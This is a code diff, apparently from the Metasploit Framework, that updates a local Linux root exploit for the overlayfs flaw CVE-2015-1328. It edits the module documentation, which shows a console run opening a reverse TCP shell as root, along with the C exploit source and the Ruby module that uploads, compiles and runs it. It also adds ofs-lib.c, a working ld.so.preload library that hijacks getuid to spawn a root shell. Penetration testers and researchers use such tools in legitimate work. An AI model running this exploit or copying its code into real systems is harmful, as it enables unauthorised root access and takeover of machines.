revamped

documentation/modules/exploit/linux/local/overlayfs_priv_esc.md

@@ -129,18 +129,18 @@ Untested against
 
 #### Escalate
 
-    resource (/root/Text-1.txt)> use exploit/linux/local/overlayfs_priv_esc
-    resource (/root/Text-1.txt)> set verbose true
+    resource (overlay.rc)> use exploit/linux/local/overlayfs_priv_esc
+    resource (overlay.rc)> set verbose true
     verbose => true
-    resource (/root/Text-1.txt)> set payload linux/x86/shell/reverse_tcp
+    resource (overlay.rc)> set payload linux/x86/shell/reverse_tcp
     payload => linux/x86/shell/reverse_tcp
-    resource (/root/Text-1.txt)> set session 1
-    session => 1
-    resource (/root/Text-1.txt)> set target 0
+    resource (overlay.rc)> set target 0
     target => 0
-    resource (/root/Text-1.txt)> set lhost 192.168.2.117
+    resource (overlay.rc)> set session 1
+    session => 1
+    resource (overlay.rc)> set lhost 192.168.2.117
     lhost => 192.168.2.117
-    resource (/root/Text-1.txt)> exploit
+    resource (overlay.rc)> exploit
     [*] Started reverse TCP handler on 192.168.2.117:4444 
     [*] Checking if mount points exist
     [+] /tmp/ns_sploit not created
@@ -150,31 +150,32 @@ Untested against
     [*] Checking if mount points exist
     [+] /tmp/ns_sploit not created
     [+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
-    [*] Writing to /tmp/k4JlQwrx.c (4375 bytes)
+    [*] Writing to /tmp/JmK51Dpa.c (3714 bytes)
     [*] Max line length is 65537
-    [*] Writing 4375 bytes in 1 chunks of 15306 bytes (octal-encoded), using printf
-    [*] Compiling /tmp/k4JlQwrx.c
-    [*] Writing to /tmp/cjKriIIN (155 bytes)
+    [*] Writing 3714 bytes in 1 chunks of 13319 bytes (octal-encoded), using printf
+    [*] Writing to /tmp/ofs-lib.c (439 bytes)
+    [*] Max line length is 65537
+    [*] Writing 439 bytes in 1 chunks of 1563 bytes (octal-encoded), using printf
+    [*] Compiling /tmp/JmK51Dpa.c
+    [*] Writing to /tmp/R6TrMF7f (155 bytes)
     [*] Max line length is 65537
     [*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
     [*] Exploiting...
     [*] Sending stage (36 bytes) to 192.168.2.156
-    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:57869) at 2016-10-04 22:55:04 -0400
-    [+] Deleted /tmp/k4JlQwrx.c
-    [+] Deleted /tmp/cjKriIIN
+    [*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.156:35876) at 2016-10-14 11:26:49 -0400
+    [!] Tried to delete /tmp/ofs-lib.c, unknown result
+    [+] Deleted /tmp/JmK51Dpa
     
-    3437009797
-    lGTsPkjgaOAhZPAssSiPBdigTNuavPNA
+    2356964145
+    psMfOJcKGKnafhAvALIeSFNegauafmux
+    RHxxKeTrEKLTMmssPTZjlJvkpblZjWSH
+    KWETRaFhNLLRkUbhRkRoflvdRdbJBPFP
     true
-    zQgQeZUDzBZvCUelOYXjpIviozSnTjoE
-    ZaGCLiKvvhyTawBwPHNqidQSerdmxDYE
-    WjOaBQVXdxHBiVdomUBMRRrnLOPUGfGD
-    true
-    DgSZZHBIFrsBMvyRTBNSBTcRmVMZXMyx
-    bwHnnuHwZAvSsZoYLhNrcuRDIKuqPRWu
-    NfNIsINldyrgOLLagCPIQiQsZqTsmUec
+    ORoIgajQlzSvaciHEGqEvQZqLZMpJDjQ
+    dTdIcyWRpQOpEHizUhOQkDVqQZaxQIFR
+    UCINXsLPGwYDBqnRKbFyLFOzkbifFPiF
     sh: 0: can't access tty; job control turned off
-    # whoami
+    # # # whoami
     root
     # uname -a
     Linux Ubuntu14 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

external/source/exploits/CVE-2015-1328/1328.c

@@ -95,6 +95,7 @@ main(int argc, char **argv)
     }
 
     fprintf(stderr,"/etc/ld.so.preload created\n");
+    /*
     fprintf(stderr,"creating shared library\n");
     lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
     write(lib,LIB,strlen(LIB));
@@ -103,7 +104,7 @@ main(int argc, char **argv)
     if(lib != 0) {
         fprintf(stderr,"couldn't create dynamic library\n");
         exit(-1);
-    }
+    }*/
     write(fd,"/tmp/ofs-lib.so\n",16);
     close(fd);
     system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");

external/source/exploits/CVE-2015-1328/ofs-lib.c

@@ -0,0 +1,16 @@
+#include <unistd.h>
+
+uid_t(*_real_getuid) (void);
+char path[128];
+
+uid_t getuid(void){
+  _real_getuid = (uid_t(*)(void)) dlsym((void *) -1, "getuid");
+  readlink("/proc/self/exe", (char *) &path, 128);
+  if(geteuid() == 0 && !strcmp(path, "/bin/su")) {
+    unlink("/etc/ld.so.preload");unlink("/tmp/ofs-lib.so");
+    setresuid(0, 0, 0);
+    setresgid(0, 0, 0);
+    execle("/bin/sh", "sh", "-i", NULL, NULL);
+  }
+  return _real_getuid();
+}

modules/exploits/linux/local/overlayfs_priv_esc.rb

@@ -161,17 +161,6 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
     end
 
-
-    # direct copy of code from exploit-db.  There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
-    path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-1328', '1328.c')
-    fd = ::File.open( path, "rb")
-    cve_2015_1328 = fd.read(fd.stat.size)
-
-    # direct copy of code from exploit-db.  There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
-    path = ::File.join( Msf::Config.install_root, 'external', 'sources', 'exploits', 'CVE-2015-8660', '8660.c')
-    fd = ::File.open( path, "rb")
-    cve_2015_8660 = fd.read(fd.stat.size)
-
     filename = rand_text_alphanumeric(8)
     executable_path = "#{datastore['WritableDir']}/#{filename}"
     payloadname = rand_text_alphanumeric(8)
@@ -200,33 +189,70 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')
     end
 
-    def upload_and_chmod(fname,fcontent)
+    def upload_and_chmod(fname, fcontent, cleanup=true)
       print_status "Writing to #{fname} (#{fcontent.size} bytes)"
       rm_f fname
       write_file(fname, fcontent)
       cmd_exec("chmod +x #{fname}")
-      #register_file_for_cleanup(fname)
+      if cleanup
+        register_file_for_cleanup(fname)
+      end
     end
 
     def on_new_session(session)
       super
       if target.name == 'CVE-2015-1328'
         session.shell_command("/bin/su") #this doesnt work on meterpreter?????
+        # we cleanup here instead of earlier since we needed the /bin/su in our new session
+        session.shell_command('rm -f /etc/ld.so.preload')
+        session.shell_command('rm -f /tmp/ofs-lib.so')
       end
     end
 
+    if compile
+      begin
+        if target.name == 'CVE-2015-1328'
+          # direct copy of code from exploit-db.  There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
+          # Also removed the on-the-fly compilation of ofs-lib.c and we do that manually ahead of time, or drop the binary.
+          path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', '1328.c')
+          fd = ::File.open( path, "rb")
+          cve_2015_1328 = fd.read(fd.stat.size)
+          fd.close
+
+          # pulled out from 1328.c's LIB define
+          path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-1328', 'ofs-lib.c')
+          fd = ::File.open( path, "rb")
+          ofs_lib = fd.read(fd.stat.size)
+          fd.close
+        else
+          # direct copy of code from exploit-db.  There were a bunch of ducplicate header includes I removed, and a lot of the comment title area just to cut down on size
+          path = ::File.join( Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2015-8660', '8660.c')
+          fd = ::File.open( path, "rb")
+          cve_2015_8660 = fd.read(fd.stat.size)
+          fd.close
+        end
+      rescue
+        compile = false #hdm said external folder is optional and all module should run even if external is deleted.  If we fail to load, default to binaries
+      end
+    end
+
+
     if compile
       if target.name == 'CVE-2015-1328'
         cve_2015_1328.gsub!(/execl\("\/bin\/su","su",NULL\);/,
                             "execl(\"#{payload_path}\",\"#{payloadname}\",NULL);")
         upload_and_chmod("#{executable_path}.c", cve_2015_1328)
+        ofs_path = "#{datastore['WritableDir']}/ofs-lib"
+        upload_and_chmod("#{ofs_path}.c", ofs_lib)
+        cmd_exec("gcc -fPIC -shared -o #{ofs_path}.so #{ofs_path}.c -ldl -w") # compile dependency file
+        register_file_for_cleanup("#{ofs_path}.c")
       else
         cve_2015_8660.gsub!(/os.execl\('\/bin\/bash','bash'\)/,
                             "os.execl('#{payload_path}','#{payloadname}')")
         upload_and_chmod("#{executable_path}.c", cve_2015_8660)
       end
       vprint_status("Compiling #{executable_path}.c")
-      cmd_exec("gcc -o #{executable_path} #{executable_path}.c") #compile
+      cmd_exec("gcc -o #{executable_path} #{executable_path}.c") # compile
       register_file_for_cleanup(executable_path)
     else
       if target.name == 'CVE-2015-1328'
@@ -235,9 +261,18 @@ class MetasploitModule < Msf::Exploit::Local
         cve_2015_1328 = fd.read(fd.stat.size)
         fd.close
         upload_and_chmod(executable_path, cve_2015_1328)
+
+        path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-1328', 'ofs-lib.so')
+        fd = ::File.open( path, "rb")
+        ofs_lib = fd.read(fd.stat.size)
+        fd.close
+        ofs_path = "#{datastore['WritableDir']}/ofs-lib"
+        # dont auto cleanup or else it happens too quickly and we never escalate ourprivs
+        upload_and_chmod("#{ofs_path}.so", ofs_lib, false)
+
         # overwrite with the hardcoded variable names in the compiled versions
-        payload_filename = 'cjKriIIN'
-        payload_path = '/tmp/cjKriIIN'
+        payload_filename = 'lXqzVpYN'
+        payload_path = '/tmp/lXqzVpYN'
       else
         path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8660', '8660')
         fd = ::File.open( path, "rb")